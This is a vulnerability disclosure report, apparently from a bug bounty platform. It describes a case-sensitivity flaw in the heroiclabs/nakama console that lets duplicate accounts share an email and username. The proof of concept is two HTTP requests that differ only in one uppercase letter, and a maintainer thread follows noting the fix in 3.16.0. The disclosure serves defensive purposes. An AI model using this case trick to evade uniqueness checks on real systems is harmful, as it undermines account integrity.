Multiple user accounts via same email and username in heroiclabs/nakama

Valid

Reported on

Sep 4th 2022

Description

Nakama console does not validate uppercase/lowercase letters when creating a new user. This can be abused to create multiple user accounts with same email and username.

Proof of Concept

HTTP Request #1

POST /v2/console/user HTTP/1.1
Host: 192.168.1.16:7351
Authorization: Bearer <token>
Cookie: <cookies>

{"username":"test","email":"test@example.com +","password":"Test1234","role":4,"newsletter_subscription":false}

HTTP Request #2

POST /v2/console/user HTTP/1.1
Host: 192.168.1.16:7351
Authorization: Bearer <token>
Cookie: <cookies>

{"username":"test","email":"test@Example.com +","password":"Test1234","role":4,"newsletter_subscription":false}

Notice that the character "E" is uppercase in the second request. This helps evade the same email checks. This trick applies to username as well.

Impact

Violation of Secure Design Principles and Business Logic Issues

We are processing your report and will contact the heroiclabs/nakama team within 24 hours. 7 months ago

Niraj Khatiwada modified the report

7 months ago

A heroiclabs/nakama maintainer has acknowledged this report 7 months ago

Niraj Khatiwada

commented 5 months ago

Researcher

Any updates?

Andrei Mihu validated this vulnerability 2 months ago

Niraj Khatiwada has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Andrei Mihu marked this as fixed in 3.16.0 with commit ada6f9 2 months ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

This vulnerability is scheduled to go public on Feb 1st 2023

Andrei Mihu published this vulnerability 2 months ago

to join this conversation